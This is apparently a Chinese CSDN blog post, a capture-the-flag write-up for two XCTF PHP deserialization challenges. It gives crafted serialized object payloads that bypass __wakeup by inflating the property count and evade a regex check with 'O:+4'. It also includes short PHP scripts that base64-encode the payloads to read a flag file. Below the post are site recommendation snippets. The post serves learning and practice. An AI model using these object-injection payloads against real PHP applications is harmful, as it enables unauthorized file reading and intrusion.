两道反序列化例题

已于 2022-05-04 10:32:50 修改
阅读量1.2k 收藏
点赞数 1
分类专栏: ctf记录 文章标签: php 安全 开发语言
于 2022-05-03 20:33:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limenzzz/article/details/124461049
版权

1.Web_php_unserialize

先代码审计,发现定义了demo类,而在其中有一句

这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造

O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";}   //原构造,未构建任何绕过
O:4:"demo":2:{s:10:"Demofile";s:8:"fl4g.php";}   //尝试绕过wake_up()
O:+4:"demo":2:{s:10:"Demofile";s:8:"fl4g.php";}  //在前面将4改为+4绕过正则匹配

正则匹配解析preg_match('/[oc]:\d+:/i', $var) 
在var中检测是否为  o:数字  或  c:数字   开头

而在这里有base64的一次解码所以需要base64加密后再上传

于是在vscode上构造base64转化

<?php 
class Demo { 
    private $file = 'fl4g.php';
}
$s='O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}';
$x= serialize(new Demo);
$x=str_replace('O:4', 'O:+4',$x);
$x=str_replace(':1:', ':3:',$x);
echo base64_encode($s);
echo '      ';
echo base64_encode($x);
?>

在这里我构造了两个结果,最后出来的结果不相同,s将全部的序列化值直接转为base64而x为将fl4g.php转化为序列化后再通过代码修改序列化结果进行反序列化,但最后结果不同,使用base64解码回去发现用函数序列化的有特殊字符,所以必须用函数序列化。

 

 将base64后的值传参给var得到flag

 2.unserialize3

 又是_wakeup()函数

写代码用vscode绕过调试

<?php 
class xctf { 
    public $flag = '111';
}
$x= serialize(new xctf);
$x=str_replace(':1:', ':3:',$x);
echo $x;
?>

 

 传参后得到

总结

下次总结一下文件包含和伪协议,因为发现反序列化里有不少题目也用到了ssrf之类的知识,所以要学习一下再来做反序列化总结(续)

希望自己不要这么菜吧   _(:з」∠)_   ----L1men2 

L1men2
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PHP反序列化题目
Galaxy_fan的博客
10-01 885
百度杯十月场_Hash hash用Md5解密是kkkkkk01123 把123换成234,MD5加密 获得变量var,base64解密,正则匹配,如果匹配程序结束,否则反序列化变量var 为了得到f15g_is_here.php内容要绕过正则匹配和_wakeup方法。_wakeup有一个bug就是当序列化字符串中表示对象属性个数的值大于真是的属性个数是就会跳过_wakeup,然后绕过正则可以...
【java】序列化和反序列化简单示例
CamphorBlossom的博客
01-31 2061
概念 java提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列(包括对象的数据、有关对象的类型和存储的数据类型信息)。简单点说,序列化表示将对象的状态转化成特定的流的过程;反序列化表示从特定的流中获取数据重新构建成对象的过程。 流:stream,二进制的字节序列。 另一方面理解,从内存读取到硬盘上的过程,可以看做是拆分对象;从硬盘读取到内存里的过程,可以看做是组装对象。 序列化的实现 类 ObjectInputStream 和 ObjectOutputStream 是
CTF 反序列化入门例题wp
qq_47168481的博客
10-20 2598
最近有再看反序列化,尝试着学一下比赛中的反序列化: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
php反序列化以及相关例题
最新发布
2401_82388450的博客
04-28 1127
1.序列化就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。简单来说就是将内存变成文件,在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件中的持久数据的过程。2.反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。
关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法
m0_63138919的博客
10-13 2057
本文为preg_match('/^O:d+/')正则 匹配绕过的方法
PHP反序列化之练习题
shy的博客
11-29 1516
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
php反序列化例题.docx
07-18
序列化和反序列化是两个相互逆操作的过程。序列化是将 PHP 对象或数组转换为字符串的过程,而反序列化则是将字符串转换回 PHP 对象或数组的过程。 二、PHP 反序列化函数 PHP 提供了两个用于序列化和反序列化的函数...
序列化反序列化例题net
12-12
在.NET框架中,序列化和反序列化是两个重要的概念,它们主要用于数据持久化、网络传输和跨进程通信。理解并熟练运用这些技术对于任何.NET开发者来说都是至关重要的。 序列化是将对象的状态(包括其属性和字段)转换...
PHP常见的序列化与反序列化操作实例分析
10-16
PHP编程中,序列化和反序列化是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
Java-IO流高级-例题 & 例题源码 & PPT教学文档(黑马程序员详细版).rar
07-24
对象流如ObjectInputStream和ObjectOutputStream,支持序列化和反序列化对象,使得对象可以被保存到文件或在网络上传输。 6. **过滤流(Filter Stream)** 过滤流可以附加在其他流上,提供额外的功能,如数据校验...
c经典编程例题
03-11
例如,文件的读写、数据的序列化和反序列化、简单的命令行工具等,这些都是实际项目中常见的功能。通过实现这些功能,学习者可以了解到C语言在系统级编程中的应用,增强实际问题解决能力。 5. **学习方法**:对于...
三道python反序列化题目介绍
a3320315的博客
03-29 715
参考链接 从Balsn CTF pyshv学习python反序列化 源码以及wp:https://github.com/sasdf/ctf/tree/master/tasks/2019/BalsnCTF/misc python反序列化 和其他语言的序列化一样,Python 的序列化的目的也是为了保存、传递和恢复对象的方便性,在众多传递对象的方式中,序列化和反序列化可以说是最简单和最容易实现的方式。...
(Java)反序列化小练习
m0_46390077的博客
01-18 438
JAVA反序列化漏洞是由于开发者重写了readObject方法,该readObject方法方法调用了别的方法,最终执行到了例如Transfrom方法的危险方法。person调用talk时时调用了自己的talk,student中没有自己的talk但是student继承了person父类的talk方法。方法,该方法用于向标准输出设备(通常是控制台)打印一行字符串并自动换行。在这里,它打印出的是字符串"lin"。:这一行是在主方法内部的唯一一行代码,它调用了Java内置的。自己有了talk就调用自己的。
ctfshow 反序列化
m0_62422842的博客
07-07 1761
涉及到的题目是web254~web266
php函数
weixin_43995930的博客
10-09 310
php函数希望能够帮助到你serialize() -- 对象序列化功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 希望...
安恒月赛WriteUp-2018.12
BlusKing
12-22 2889
安恒月赛WriteUp2018-12月   WEB1-easy: web1反序列化   一打开就显示了源代码:  &lt;?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
PHP反序列化练习册
qwsn
11-19 2599
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web类
攻防世界-Web-Exercise-Wirteup
08-08 393
攻防世界Web题进阶区题目部分记录。前面题型比较基础,仅记录较为典型的题目用于以后知识点的回顾。 目录 Web_php_unserialize Web_php_unserialize 题目描述: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function _
攻防世界web高手进阶区 Web_php_unserialize
weixin_61835841的博客
04-20 932
有错请各位大佬指正 文章目录 工具 分析 操作 工具 1.火狐 2.phpstudy 分析 本题主要考察的知识点: 1.__construct():当对象创建(new)时会自动调用。将传入的 $file 赋值给本地的私有方法 $file 2.unserialize() 时是不会自动调用的。(构造函数) 3.__destruct():当对象被销毁时会自动调用。(析构函数) 4.__wakeup():unserialize() 时.
Java对象序列化与反序列化详解
自定义序列化有两种方式:一是重写`writeObject()`和`readObject()`方法,这种方式允许对序列化的行为进行精细控制;二是实现`Externalizable`接口,直接控制序列化和反序列化的具体过程。 在进行序列化时,应确保...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值